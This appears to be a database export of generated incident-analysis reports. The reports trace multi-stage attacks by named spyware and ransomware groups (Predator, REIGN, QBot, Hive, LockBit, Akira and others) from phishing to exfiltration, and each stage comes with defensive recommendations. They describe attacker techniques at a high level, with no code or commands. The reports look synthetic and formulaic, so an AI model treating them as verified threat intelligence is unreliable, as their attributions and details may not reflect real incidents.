(871, 177, 1517, 1, 'Analysis of Phishing Tactics Used', '### Overview\nThe initial alert, *Suspicious Email Attachment Detected*, suggests a targeted phishing attempt designed to deliver the Cytrox Predator Spyware. Upon investigation, the phishing email was found to contain a malicious attachment disguised as a legitimate document.\n\n### Details\n- **Subject Line**: \"Urgent Policy Update Required\"\n- **Attachment Name**: \"PolicyUpdate.docx\"\n- **Sender Profile**: The sender mimicked a known government official\'s email address.\n\n### Threat Actor Tactics\nThe attacker used social engineering techniques to build trust, leveraging current political events to craft a compelling narrative. This suggests a well-researched operation targeting opposition politicians.\n\n### Recommendations\n- **Training**: Conduct phishing awareness training for potential targets.\n- **Filtering**: Strengthen email filtering systems to detect suspicious attachments.', '2026-03-15 19:10:11'),
(872, 177, 1518, 2, 'Zero-click Exploit Analysis', '### Overview\nFollowing the initial phishing attempt, a *Zero-click Exploit Triggered* alert indicates that the spyware executed a remote code execution without user interaction. This sophisticated attack vector suggests advanced capabilities of the threat actor.\n\n### Exploit Details\n- **Vulnerability**: Leveraged a previously unknown zero-day in messaging apps.\n- **Target Device**: Latest iOS version, indicating a high level of sophistication.\n\n### Implications\nThe zero-click exploit allows for full device compromise, enabling the attacker to bypass traditional security measures and gain persistent access.\n\n### Recommendations\n- **Patch Management**: Collaborate with vendors to accelerate patch release.\n- **Monitoring**: Enhance anomaly detection on devices to identify unusual behavior.', '2026-03-15 19:10:11'),
(873, 177, 1519, 3, 'Persistence Mechanism Identified', '### Overview\nUpon execution, the Cytrox Predator Spyware has established persistence on the compromised device, as indicated by the *Spyware Establishes Persistence* alert. Understanding this mechanism is crucial for effective remediation.\n\n### Persistence Techniques\n- **Fileless Persistence**: Utilizes system processes to avoid detection.\n- **Scheduled Tasks**: Implements tasks to reinstate itself after removal attempts.\n\n### Impact\nThis persistence allows the spyware to maintain its foothold, continually exfiltrating sensitive information and conducting surveillance.\n\n### Recommendations\n- **Forensic Analysis**: Perform comprehensive device forensic analysis to detect and remove persistent components.\n- **Security Protocols**: Update security protocols to prevent re-establishment of persistence.', '2026-03-15 19:10:11'),
(874, 177, 1520, 4, NULL, NULL, '2026-03-15 19:10:11'),
(875, 176, 1521, 1, 'Analysis of Phishing Techniques', '### Overview\nThe suspicious phishing email detected employs advanced social engineering techniques, masquerading as a legitimate communication from a trusted source.\n\n### Tactics\n- **Spoofed Email Address**: The sender\'s address closely resembles that of a known vendor.\n- **Urgent Call to Action**: The email subject line includes an urgent request for immediate action.\n- **Malicious Attachment**: Contains an attachment designed to exploit vulnerabilities in email client applications.\n\n### Recommendations\n- Implement filters to detect and block similar phishing attempts.\n- Educate employees on recognizing phishing emails.', '2026-03-15 19:10:20'),
(876, 176, 1522, 2, 'Mobile Device Malware Execution', '### Overview\nFollowing the phishing email, the malware was successfully executed on the target\'s mobile device.\n\n### Infection Vector\n- **Payload Delivery**: Delivered via an attachment that exploited a known security vulnerability in the mobile OS.\n- **Execution**: Triggers upon opening the attachment, bypassing standard security checks.\n\n### Mitigation Steps\n- Update mobile device software to patch known vulnerabilities.\n- Use mobile threat defense solutions to detect and block malware execution.', '2026-03-15 19:10:20'),
(877, 176, 1523, 3, 'Persistence Mechanisms on Mobile Devices', '### Overview\nThe malware establishes persistence on the infected mobile device, allowing for ongoing surveillance and data collection.\n\n### Persistence Techniques\n- **Rootkit Deployment**: Installs root-level access to survive reboots and updates.\n- **Background Service**: Runs as a background process, avoiding detection.\n\n### Recommendations\n- Conduct regular device audits to detect unauthorized applications.\n- Use endpoint security solutions to monitor and prevent persistence mechanisms.', '2026-03-15 19:10:20'),
(878, 176, 1524, 4, 'Credential Harvesting Tactics', '### Overview\nCredential harvesting was detected, indicating the malware\'s intent to capture sensitive login information.\n\n### Techniques Used\n- **Keylogging**: Records keystrokes to capture usernames and passwords.\n- **Phishing Pages**: Redirects users to fake login pages mimicking legitimate sites.\n\n### Countermeasures\n- Implement multi-factor authentication to reduce the impact of credential theft.\n- Use anti-phishing tools to detect and block fake login pages.', '2026-03-15 19:10:20'),
(879, 176, 1525, 5, 'Lateral Movement Attempts', '### Overview\nThe malware attempts lateral movement to infiltrate the corporate network from the compromised mobile device.\n\n### Movement Techniques\n- **Credential Reuse**: Utilizes stolen credentials to access network resources.\n- **Network Scanning**: Scans for vulnerable devices and services within the network.\n\n### Mitigation Strategies\n- Restrict network access for mobile devices based on security policies.\n- Monitor network traffic for signs of unauthorized access attempts.', '2026-03-15 19:10:20'),
(880, 176, 1526, 6, 'Data Exfiltration and Human Rights Implications', '### Overview\nData exfiltration has been initiated, with significant implications for privacy and human rights.\n\n### Data Exfiltration Methods\n- **Encrypted Channels**: Uses encrypted connections to transmit data to external servers.\n- **Stealth Techniques**: Minimizes bandwidth usage to avoid detection.\n\n### Human Rights Impact\n- **Surveillance Concerns**: Potential misuse of personal data for unauthorized surveillance.\n- **Privacy Violations**: Breaches of privacy may lead to human rights violations.\n\n### Recommendations\n- Implement data loss prevention solutions to monitor and block unauthorized data transfers.\n- Conduct impact assessments to understand and mitigate human rights risks.', '2026-03-15 19:10:20'),
(881, 176, 1527, 7, NULL, NULL, '2026-03-15 19:10:20'),
(882, 178, 1528, 1, 'Analysis of Malicious Payload Execution', '## Overview\nFollowing the initial detection of suspicious browser exploits, our team has confirmed the execution of a malicious payload. This payload is designed to exploit vulnerabilities within Windows browsers, specifically targeting those used by activists and journalists.\n\n## Technical Details\n- **Payload Type**: The payload is identified as a binary executable that initializes upon browser exploit.\n- **Execution Mechanism**: Utilizes PowerShell scripts to execute further code.\n- **Targets**: Primarily Windows-based systems running outdated browser versions.\n\n## Impact\nThe execution phase indicates a transition from mere exploitation to active threat engagement, potentially allowing for unauthorized access and manipulation of the target system.\n\n## Next Steps\nMonitoring for the establishment of command and control infrastructure is critical to understanding the spyware\'s full operational capabilities.', '2026-03-15 19:10:36'),
(883, 178, 1529, 2, 'Command and Control Infrastructure Established', '## Overview\nPost-execution of the malicious payload, our analysis reveals the establishment of a Command and Control (C2) infrastructure. This represents a significant escalation in the spyware\'s operation, allowing attackers to maintain persistent access.\n\n## Technical Details\n- **C2 Protocols**: Communication over HTTPS with encrypted traffic.\n- **Persistence Mechanisms**: Registry modifications and scheduled tasks ensure the malware remains active.\n- **C2 Servers**: Geographically dispersed, utilizing both legitimate cloud services and compromised servers.\n\n## Implications\nThis development allows attackers to remotely execute commands, deploy additional payloads, and potentially manipulate or exfiltrate data from the target systems.\n\n## Recommendations\nImmediate remediation efforts should focus on disrupting C2 communications and mitigating further data exfiltration risks.', '2026-03-15 19:10:36'),
(884, 178, 1530, 3, 'Data Exfiltration Patterns Identified', '## Overview\nFollowing the establishment of Command and Control channels, data exfiltration activities have been detected. This marks a critical phase where sensitive information is being extracted from compromised systems.\n\n## Technical Details\n- **Data Types**: Documents, emails, contact lists, and browsing histories.\n- **Exfiltration Channels**: Encrypted uploads to remote servers disguised as normal traffic.\n- **Timing**: Exfiltration occurs during low activity periods to avoid detection.\n\n## Impact\nThe exfiltration of data poses severe risks to the privacy and security of targeted individuals, with potential ramifications for their safety.\n\n## Countermeasures\nEnhanced monitoring and network traffic analysis are essential to identify and block exfiltration attempts. Collaboration with ISPs and cloud service providers may aid in tracing and neutralizing the threat actors\' infrastructure.', '2026-03-15 19:10:36'),
(885, 178, 1531, 4, NULL, NULL, '2026-03-15 19:10:36'),
(886, 179, 1532, 1, 'Analysis of Zero-Click iCloud Calendar Exploit', '# Analysis of Zero-Click iCloud Calendar Exploit\n\n## Context\nAfter identifying the initial access method utilized in the Quadream REIGN spyware operation, further analysis reveals the sophistication of the zero-click iCloud calendar exploit.\n\n## Technical Details\n- **Exploit Vector**: The exploit leverages a zero-click mechanism within the iCloud calendar invites, allowing malicious payloads to be executed without user interaction.\n- **Affected Platforms**: Primarily targets iOS devices running versions susceptible to this exploit.\n\n## Next Steps\nThe next phase of investigation will focus on the execution of the REIGN spyware on compromised iOS devices, assessing the impact and identifying any protective measures that can be implemented.', '2026-03-15 19:11:07'),
(887, 179, 1533, 2, 'Deep Dive into REIGN Spyware Execution on iOS', '# Deep Dive into REIGN Spyware Execution on iOS\n\n## Context\nFollowing the delivery of the payload via the zero-click exploit, the REIGN spyware initiates execution on targeted iOS devices.\n\n## Technical Details\n- **Execution Mechanism**: Utilizes system vulnerabilities to gain initial execution permissions.\n- **Capabilities**: Once executed, REIGN can intercept communications, access files, and monitor user activities.\n\n## Next Steps\nThe focus will now shift to understanding how the spyware maintains persistence on infected devices, ensuring long-term access and data collection.', '2026-03-15 19:11:07'),
(888, 179, 1534, 3, 'Establishing Persistence on iOS Devices', '# Establishing Persistence on iOS Devices\n\n## Context\nThe persistence mechanism of the REIGN spyware ensures continuous access to the infected iOS devices, even after reboots or updates.\n\n## Technical Details\n- **Persistence Techniques**: The spyware modifies system files and utilizes root access to prevent detection and removal.\n- **Challenges**: Detection is complicated due to its integration with legitimate iOS processes.\n\n## Next Steps\nWe will investigate how the spyware utilizes credentials to perform lateral movement to associated iCloud services, expanding its reach and data collection capabilities.', '2026-03-15 19:11:07'),
(889, 179, 1535, 4, 'Lateral Movement to Connected iCloud Services', '# Lateral Movement to Connected iCloud Services\n\n## Context\nAfter establishing persistence, REIGN spyware aims to leverage credentials to access connected iCloud services, enhancing its data exfiltration capabilities.\n\n## Technical Details\n- **Credential Harvesting**: Utilizes captured credentials to authenticate and access additional services.\n- **Services Targeted**: Includes iCloud Drive, Photos, and Contacts, providing extensive surveillance opportunities.\n\n## Next Steps\nThe final analysis will focus on the methods used for exfiltration of sensitive data to external servers, assessing the scope of data breaches and potential mitigations.', '2026-03-15 19:11:07'),
(890, 179, 1536, 5, NULL, NULL, '2026-03-15 19:11:07'),
(891, 180, 1537, 1, 'Analyzing the Phishing Attack Vector', '## Overview\nThe initial phase of Black Basta\'s operation involved a phishing email containing a malicious attachment. This email was crafted to appear as a legitimate business communication, increasing the likelihood of user interaction.\n\n## Key Indicators\n- **Sender Domain**: The email originated from a domain resembling a known supplier.\n- **Attachment Type**: Executable file masquerading as a PDF.\n\n## Next Steps\nGiven this initial breach, the next phase typically involves the deployment of malware. Monitoring network traffic for unusual patterns is essential to identify the execution of QBot malware.', '2026-03-15 19:11:40'),
(892, 180, 1538, 2, 'QBot Malware Execution and Its Implications', '## Overview\nFollowing the successful phishing attack, QBot malware has been executed. QBot is known for its use in banking fraud but is also utilized to create a foothold in systems for ransomware deployment.\n\n## Key Indicators\n- **Process Activity**: Unusual process creation linked to QBot binaries.\n- **Network Activity**: Communication with command and control servers.\n\n## Next Steps\nWith QBot active, the focus shifts to establishing persistence. This often involves manipulating system registries or scheduled tasks to ensure malware survives reboots.', '2026-03-15 19:11:40'),
(893, 180, 1539, 3, 'Persistence Mechanisms: Registry Modifications', '## Overview\nTo maintain a foothold within the compromised network, Black Basta employs registry modifications as a persistence mechanism. This ensures that malware can survive system reboots and remain active.\n\n## Key Indicators\n- **Registry Changes**: Entries created or modified in `HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`.\n- **Scheduled Tasks**: New tasks that trigger the execution of QBot.\n\n## Next Steps\nWith persistence established, lateral movement becomes the next objective for threat actors. Monitoring inter-system communication and user account activities is critical to detect and prevent lateral movement.', '2026-03-15 19:11:40'),
(894, 180, 1540, 4, 'Detecting and Mitigating Lateral Movement', '## Overview\nLateral movement is a crucial phase wherein attackers attempt to move through the network to identify and access critical assets. Black Basta leverages tools and native OS features to navigate laterally.\n\n## Key Indicators\n- **Unusual Logins**: Multiple login attempts across various systems.\n- **Network Traffic**: Increase in SMB protocol usage.\n\n## Next Steps\nAs lateral movement has been detected, attention must now turn to preventing data exfiltration. Implement data loss prevention (DLP) measures and closely monitor outbound traffic for signs of data being sent to unauthorized destinations.', '2026-03-15 19:11:40'),
(895, 180, 1541, 5, NULL, NULL, '2026-03-15 19:11:40'),
(896, 181, 1542, 1, 'Investigative Report: Malicious Macro Execution', '# Investigative Report: Malicious Macro Execution\n\n## Overview\nFollowing the detection of a suspicious phishing email, further investigation has revealed the execution of a malicious macro embedded within an attached document. This execution phase is critical as it lays the groundwork for further infiltration into the system.\n\n## Technical Details\n- **Document Type**: Microsoft Word\n- **Macro Language**: VBA Script\n- **Observed Behavior**: Upon opening the document, the macro initiates a script that downloads a secondary payload from a remote server.\n\n## Recommendations\n- Immediate disabling of macros across the organization unless explicitly required.\n- Conduct a thorough review of email security protocols to prevent future incidents.', '2026-03-15 19:12:00'),
(897, 181, 1543, 2, 'Report on Persistence Mechanisms', '# Report on Persistence Mechanisms\n\n## Overview\nThe operation has progressed to the persistence phase, where Royal APT is attempting to maintain a foothold within the compromised infrastructure.\n\n## Observed Techniques\n- **Registry Modification**: Changes made to the Windows Registry to ensure payload execution at boot.\n- **Scheduled Tasks**: Creation of scheduled tasks to execute malicious scripts at regular intervals.\n\n## Implications\nThese mechanisms suggest a strategic attempt to ensure the ongoing presence and resilience of the threat actor within the network.\n\n## Countermeasures\n- Regularly audit registry changes and scheduled tasks.\n- Implement endpoint detection and response (EDR) solutions to identify anomalies.', '2026-03-15 19:12:00'),
(898, 181, 1544, 3, 'Internal Network Reconnaissance Analysis', '# Internal Network Reconnaissance Analysis\n\n## Overview\nRoyal APT has initiated internal network reconnaissance, a critical step for lateral movement within the network.\n\n## Techniques Identified\n- **Network Scanning**: Utilization of tools like Nmap to map out network topology.\n- **Credential Dumping**: Attempts to extract stored credentials using tools like Mimikatz.\n\n## Potential Risks\n- Identification of key systems and data repositories for further exploitation.\n- Compromise of additional user accounts to facilitate lateral movement.\n\n## Mitigation Strategies\n- Monitor network traffic for unusual scanning behavior.\n- Enforce strong password policies and multi-factor authentication (MFA).', '2026-03-15 19:12:00'),
(899, 181, 1545, 4, 'Data Exfiltration Alert: Incident Report', '# Data Exfiltration Alert: Incident Report\n\n## Overview\nThe operation has reached a critical stage with detected data exfiltration activities by Royal APT.\n\n## Methodology\n- **Exfiltration Channels**: Use of encrypted channels to bypass traditional detection mechanisms.\n- **Data Types Targeted**: Sensitive business and personal data, including intellectual property.\n\n## Impact Assessment\nThe data exfiltration poses significant risks to organizational security and confidentiality, potentially leading to financial and reputational damage.\n\n## Response Actions\n- Initiate immediate incident response protocols to contain and remediate the breach.\n- Engage with cybersecurity experts to perform a detailed forensic analysis and prevent future incidents.', '2026-03-15 19:12:00'),
(900, 181, 1546, 5, NULL, NULL, '2026-03-15 19:12:00'),
(901, 182, 1547, 1, 'Analysis of Exchange Server Compromise', '### Overview\nFollowing the detection of suspicious access to the Exchange Server, a detailed analysis was conducted. Initial indicators suggest exploitation of known vulnerabilities in Exchange Server versions recently patched by Microsoft.\n\n### Technical Details\n- **CVE**: Possible exploitation of CVE-2021-26855, known as ProxyLogon.\n- **Attack Vector**: Unauthorized access was achieved through a compromised email account.\n\n### Recommendations\n- Immediate application of the latest security patches.\n- Review and harden email account credentials.\n- Monitor network for further unauthorized access attempts.\n\n### Next Steps\nPrepare for potential execution of malicious scripts as attackers often deploy payloads shortly after initial access.', '2026-03-15 19:12:22'),
(902, 182, 1548, 2, 'Detection of Malicious Script Execution', '### Overview\nPost detection of initial access, a malicious PowerShell script was executed on the compromised server. This script is designed to establish further foothold and facilitate persistence.\n\n### Script Capabilities\n- **Functionality**: Downloads additional payloads, creates backdoors.\n- **Indicators of Compromise (IoCs)**: Presence of encoded PowerShell commands in logs.\n\n### Recommendations\n- Immediate isolation of affected systems.\n- Conduct memory forensics to identify and remove malicious scripts.\n\n### Next Steps\nBe vigilant for persistence mechanisms that may have been installed to enable repeated access to the network.', '2026-03-15 19:12:22'),
(903, 182, 1549, 3, 'Persistence Mechanism Analysis', '### Overview\nThe attackers have successfully installed persistence mechanisms, allowing them to maintain access to the compromised server despite system reboots.\n\n### Technical Details\n- **Persistence Techniques**: Scheduled tasks and registry modifications.\n- **Tools Used**: Commonly used APT tools for persistence include Cobalt Strike and Empire.\n\n### Recommendations\n- Review and clean up scheduled tasks and registry keys.\n- Implement strict monitoring of task scheduler activities.\n\n### Next Steps\nMonitor for unusual lateral movement as attackers may attempt to spread across the network leveraging the established foothold.', '2026-03-15 19:12:22'),
(904, 182, 1550, 4, 'Lateral Movement and Data Exfiltration', '### Overview\nUnusual lateral movement activities detected, suggesting attempts to access other systems within the network. Data exfiltration attempts have also been identified.\n\n### Technical Details\n- **Lateral Movement Tools**: Use of RDP and SMB protocols to explore network.\n- **Data Exfiltration Method**: Encrypted archives being transferred via HTTP/S.\n\n### Recommendations\n- Restrict lateral movement by tightening network segmentation.\n- Monitor outbound traffic for large or unusual data transfers.\n\n### Next Steps\nStrengthen defenses against ransomware deployment as data exfiltration often precedes such attacks.', '2026-03-15 19:12:22'),
(905, 182, 1551, 5, NULL, NULL, '2026-03-15 19:12:22'),
(906, 183, 1552, 1, 'Analysis of Phishing Tactics', '### Overview\nFollowing the detection of a phishing email, an analysis was conducted to understand the tactics employed by Vice Society to gain initial access.\n\n### Key Findings\n- **Target Audience**: The phishing email was directed primarily at school administrators and IT staff, mimicking official education department communications.\n- **Social Engineering**: The email contained urgent language, prompting recipients to update security credentials immediately.\n- **Payload**: A malicious link disguised as a document download was identified, leading to a credential harvesting site.\n\n### Recommendations\n- Conduct phishing awareness training for staff.\n- Implement email filtering solutions to detect and quarantine suspicious emails.', '2026-03-15 19:12:42'),
(907, 183, 1553, 2, 'Investigation of Malicious Script Execution', '### Overview\nFollowing the phishing email, a malicious script was executed, indicating an advancement in the attack chain.\n\n### Key Findings\n- **Script Origin**: The script was executed from a compromised user account.\n- **Capabilities**: It was designed to disable endpoint security solutions and establish command and control with the attacker\'s server.\n- **Indicators of Compromise (IOCs)**: Detected hash values and IP addresses have been logged for further investigation.\n\n### Recommendations\n- Isolate affected systems from the network.\n- Perform a thorough forensic analysis to trace the script’s activity.', '2026-03-15 19:12:42'),
(908, 183, 1554, 3, 'Backdoor Establishment Analysis', '### Overview\nPost-execution of the malicious script, a backdoor was established, allowing persistent access for Vice Society.\n\n### Key Findings\n- **Backdoor Type**: A remote access tool disguised as a legitimate application was identified.\n- **Persistence Mechanism**: The backdoor employed registry modifications and scheduled tasks to maintain access.\n- **Communication**: The backdoor communicated with external IPs linked to known Vice Society infrastructure.\n\n### Recommendations\n- Remove unauthorized applications and registry entries.\n- Enhance monitoring to detect anomalous network traffic.', '2026-03-15 19:12:42'),
(909, 183, 1555, 4, 'Internal Network Scanning and Data Exfiltration', '### Overview\nAfter the backdoor establishment, internal network scanning was detected, followed by data exfiltration activities.\n\n### Key Findings\n- **Scanning Techniques**: Utilized a network scanning tool to identify vulnerable systems and sensitive data locations.\n- **Exfiltration Channels**: Data was exfiltrated via encrypted channels to evade detection.\n- **Impact**: Sensitive student data, including personal and academic information, was targeted.\n\n### Recommendations\n- Immediately implement network segmentation to restrict lateral movement.\n- Deploy data loss prevention (DLP) solutions to monitor and protect sensitive data.', '2026-03-15 19:12:42'),
(910, 183, 1556, 5, NULL, NULL, '2026-03-15 19:12:42'),
(911, 184, 1557, 1, 'Analysis of Initial Phishing Email', '# Analysis of Initial Phishing Email\n\n## Overview\nThe initial alert was triggered by a suspicious phishing email detected within the network. This email serves as the first vector of attack in the Hive ransomware campaign.\n\n## Email Details\n- **Sender Address**: compromised_user@knowncompany.com\n- **Subject Line**: Urgent Invoice Payment Required\n- **Attachments**: Invoice_Payment_Details.zip\n\n## Analysis\nThe email contains a ZIP file attachment which, when decompressed, reveals a malicious script. The script is designed to execute upon opening, providing an entry point for further attack vectors.\n\n## Next Steps\nThe investigation will focus on the execution of the malicious payload associated with the script to assess the depth of the breach and its potential implications.', '2026-03-15 19:13:09'),
(912, 184, 1558, 2, 'Execution of Malicious Payload', '# Execution of Malicious Payload\n\n## Overview\nFollowing the phishing email, the execution of the malicious payload was detected. This represents the second phase of the Hive ransomware infiltration.\n\n## Payload Behavior\n- **File Name**: payload.exe\n- **Execution Path**: C:\\\\Users\\\\Public\\\\payload.exe\n- **Observed Actions**: The payload initiates a series of commands to disable local security protocols and establish a foothold within the system.\n\n## Analysis\nThe payload is confirmed to be a variant of the Hive ransomware. It executes scripts that disable security defenses, facilitating further malicious activities.\n\n## Next Steps\nFocus will shift to identifying the establishment of persistent backdoor mechanisms that allow attackers to maintain access.', '2026-03-15 19:13:09'),
(913, 184, 1559, 3, 'Establishment of Persistent Backdoor', '# Establishment of Persistent Backdoor\n\n## Overview\nThe next phase involves the establishment of a persistent backdoor, allowing continuous access to the compromised network.\n\n## Backdoor Mechanisms\n- **Registry Modification**: Autostart entry added under `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`\n- **Service Creation**: A new system service designed to run at startup has been detected.\n\n## Analysis\nThe persistence mechanisms are designed to ensure the ransomware can reinfect the system even after potential removal attempts.\n\n## Next Steps\nEfforts will now pivot to detecting lateral movement as threat actors attempt to propagate the infection across the network.', '2026-03-15 19:13:09'),
(914, 184, 1560, 4, 'Lateral Movement Detected Across Network', '# Lateral Movement Detected Across Network\n\n## Overview\nLateral movement has been identified within the network, indicating an attempt to spread the ransomware to additional systems.\n\n## Techniques Used\n- **Credential Dumping**: Utilization of tools like Mimikatz to extract credentials\n- **Remote Desktop Protocol (RDP)**: Unauthorized RDP connections have been logged\n\n## Analysis\nThe attackers are leveraging compromised credentials to move through the network, increasing the threat level as more systems become at risk.\n\n## Next Steps\nThe priority is to monitor for data exfiltration attempts, as attackers may seek to extract sensitive information from the network.', '2026-03-15 19:13:09'),
(915, 184, 1561, 5, NULL, NULL, '2026-03-15 19:13:09'),
(916, 185, 1562, 1, 'Post-Phishing Analysis: Entry Point Breakdown', '### Overview\nAfter the identification of a spear phishing campaign as the initial access vector, this report delves into the tactics employed by the attackers.\n\n### Phishing Tactics\n- **Email Subjects**: Crafted to appear as urgent HR notifications or security alerts.\n- **Attachments/Links**: Malicious documents or links leading to credential harvesting pages.\n\n### Recommendations\n- **User Education**: Conduct immediate awareness training focused on recognizing phishing attempts.\n- **Email Filtering**: Enhance email filtering mechanisms to detect and block suspicious emails.', '2026-03-15 19:13:33'),
(917, 185, 1563, 2, 'Rust-Based Ransomware: Execution Details', '### Overview\nFollowing the deployment of the Rust-based ransomware, this report examines the encryption methodologies and execution flow.\n\n### Execution Flow\n- **Binary Characteristics**: The ransomware is written in Rust, which complicates reverse engineering.\n- **Encryption**: Utilizes advanced encryption algorithms targeting both local and networked resources.\n\n### Recommendations\n- **Endpoint Detection**: Employ behavioral analysis tools to detect anomalous processes.\n- **Patch Management**: Ensure all systems are up-to-date to mitigate exploitation of known vulnerabilities.', '2026-03-15 19:13:33'),
(918, 185, 1564, 3, 'Backdoor Persistence: Tactics Analyzed', '### Overview\nPost-ransomware deployment, attackers focus on establishing persistent access through backdoors.\n\n### Techniques Employed\n- **Backdoor Installation**: Leveraging system services to maintain access.\n- **Obfuscation**: Use of encryption and anti-forensic techniques to evade detection.\n\n### Recommendations\n- **Network Monitoring**: Intensify monitoring for unusual outbound connections.\n- **Access Controls**: Restrict administrative privileges and enforce MFA across all access points.', '2026-03-15 19:13:33'),
(919, 185, 1565, 4, 'Credential Dumping and Lateral Movement', '### Overview\nThe attackers shift focus to lateral movement through credential dumping, enhancing their network foothold.\n\n### Credential Dumping Methods\n- **Tool Usage**: Utilization of tools like Mimikatz to extract credentials.\n- **Exploitation of Weak Passwords**: Targeting accounts with insufficiently secure passwords.\n\n### Recommendations\n- **Password Policies**: Enforce strong, unique passwords and regular password changes.\n- **Network Segmentation**: Limit lateral movement capabilities by segmenting the network.', '2026-03-15 19:13:33'),
(920, 185, 1566, 5, NULL, NULL, '2026-03-15 19:13:33'),
(921, 186, 1567, 1, 'Malicious Payload Execution: Unpacking the Threat', '### Overview\nAfter the initial access through a sophisticated phishing campaign, the threat actors deployed a malicious payload. This payload is central to the ransomware\'s execution phase.\n\n### Technical Analysis\nThe payload used by LockBit is typically a custom-built executable designed to bypass common security measures. It leverages obfuscation techniques and employs anti-analysis checks to evade detection.\n\n### Implications\nSuccessful execution of this payload indicates a high risk of encryption of critical data. It is imperative to deploy endpoint detection and response (EDR) solutions to mitigate the impact.\n\n### Recommendations\n- **Immediate Response:** Isolate affected systems to prevent further spread.\n- **Detection:** Utilize behavioral analysis tools to identify suspicious activity indicative of ransomware execution.\n- **Prevention:** Educate employees about phishing tactics to reduce the risk of initial access.', '2026-03-15 19:15:07'),
(922, 186, 1568, 2, 'Establishing Persistence: A Deeper Dive', '### Overview\nFollowing the execution of the LockBit payload, establishing persistence is crucial for the ransomware to maintain its presence and control over compromised systems.\n\n### Technical Analysis\nLockBit employs multiple techniques to ensure persistence, including the modification of registry keys and the creation of scheduled tasks. These methods ensure the ransomware remains active even after a system reboot.\n\n### Implications\nPersistence mechanisms allow the threat actors to execute further malicious activities and complicate recovery efforts.\n\n### Recommendations\n- **Detection:** Monitor for unusual modifications in registry keys and new scheduled tasks.\n- **Remediation:** Regularly review and audit system configurations for unauthorized changes.\n- **Mitigation:** Implement application whitelisting to prevent unauthorized code execution.', '2026-03-15 19:15:07'),
(923, 186, 1569, 3, 'Lateral Movement: Strategies and Techniques', '### Overview\nOnce persistence is established, LockBit operators focus on lateral movement to expand their reach within the network.\n\n### Technical Analysis\nLateral movement often involves the use of legitimate credentials obtained through credential dumping techniques. Tools like Mimikatz may be employed to extract these credentials from memory.\n\n### Implications\nLateral movement increases the risk of additional systems being compromised and sensitive data being accessed or exfiltrated.\n\n### Recommendations\n- **Detection:** Implement network segmentation to limit lateral movement opportunities.\n- **Prevention:** Use multi-factor authentication (MFA) to protect privileged accounts.\n- **Response:** Continuously monitor network traffic for anomalies that may indicate lateral movement.', '2026-03-15 19:15:07'),
(924, 186, 1570, 4, 'Data Exfiltration: Protecting Sensitive Information', '### Overview\nAs lateral movement progresses, the primary objective of LockBit is often data exfiltration, which can precede encryption or be used for double extortion.\n\n### Technical Analysis\nData exfiltration methods include using FTP, HTTP, or HTTPS to transfer sensitive information to attacker-controlled servers. Encryption or compression of data prior to exfiltration is common to avoid detection.\n\n### Implications\nExfiltrated data can be used for extortion or sold on dark web marketplaces, posing significant risks to privacy and business operations.\n\n### Recommendations\n- **Detection:** Monitor outbound traffic for unusual data transfers, especially large volumes of data.\n- **Prevention:** Implement data loss prevention (DLP) solutions to detect and block unauthorized exfiltration attempts.\n- **Response:** Conduct regular audits of data access and implement stricter access controls to minimize data exposure.', '2026-03-15 19:15:07'),
(925, 186, 1571, 5, NULL, NULL, '2026-03-15 19:15:07'),
(926, 187, 1572, 1, 'Initial Access: Analysis of Suspicious VPN Login Attempt', '## Overview\nAfter detecting a suspicious VPN login attempt, further analysis has revealed indicators of compromise suggesting the involvement of the Akira ransomware group. The attempt originated from an IP address linked to previous cybercriminal activities.\n\n## Implications\nThe login attempt targeted Cisco VPN infrastructure, indicating a potential focus on exploiting known vulnerabilities or leveraging stolen credentials.\n\n## Recommendations\n- **Immediate Action**: Conduct a thorough review of all recent login attempts and cross-reference with known bad IPs.\n- **Preventive Measure**: Implement multi-factor authentication (MFA) across all VPN connections.', '2026-03-15 19:15:32'),
(927, 187, 1573, 2, 'Execution Phase: Malicious Payload Execution Detected', '## Overview\nFollowing the VPN breach, a malicious payload was executed within the network. This payload has been identified as a custom-built ransomware variant associated with Akira\'s operations.\n\n## Details\nThe payload exhibits advanced obfuscation techniques and is designed to evade detection by traditional security solutions.\n\n## Recommendations\n- **Immediate Action**: Isolate affected systems to prevent further spread.\n- **Preventive Measure**: Update antivirus signatures and employ behavioral analysis tools to enhance detection capabilities.', '2026-03-15 19:15:32'),
(928, 187, 1574, 3, 'Persistence: Creation of Persistent Backdoor', '## Overview\nPost-execution, a persistent backdoor was created on compromised systems, enabling the attackers to maintain access and control.\n\n## Details\nThe backdoor uses a combination of scheduled tasks and modified registry keys to ensure persistence across reboots.\n\n## Recommendations\n- **Immediate Action**: Identify and remove all unauthorized tasks and registry modifications.\n- **Preventive Measure**: Regularly audit system configuration changes and enhance monitoring of critical system directories.', '2026-03-15 19:15:32'),
(929, 187, 1575, 4, 'Lateral Movement: Propagation Across VMware ESXi Servers', '## Overview\nAttackers have initiated lateral movement, targeting VMware ESXi servers to expand their foothold within the infrastructure.\n\n## Details\nUtilizing compromised credentials and exploiting unpatched vulnerabilities, the attackers have gained unauthorized access to ESXi servers.\n\n## Recommendations\n- **Immediate Action**: Patch all VMware ESXi servers with the latest security updates.\n- **Preventive Measure**: Implement strict network segmentation to limit lateral movement capabilities.', '2026-03-15 19:15:32'),
(930, 187, 1576, 5, NULL, NULL, '2026-03-15 19:15:32'),
(931, 188, 1577, 1, 'Analysis of Phishing Email Campaign Tactics', '# Analysis of Phishing Email Campaign Tactics\n\n## Executive Summary\nThe initial access vector for the NoEscape ransomware operation has been identified as a phishing campaign targeting healthcare sector employees. This report provides analysis of the phishing tactics used, including subject lines, sender profiles, and malware delivery methods.\n\n## Details\n- **Subject Lines**: Common themes observed include urgent billing issues and COVID-19 updates.\n- **Sender Profiles**: The emails appear to originate from legitimate healthcare organizations, leveraging compromised email accounts.\n- **Malware Delivery**: Attachments containing malicious macros or links to credential phishing websites are used.\n\n## Recommendations\n- Implement email filtering solutions to detect and block phishing emails.\n- Conduct regular training for employees on phishing awareness.', '2026-03-15 19:15:50'),
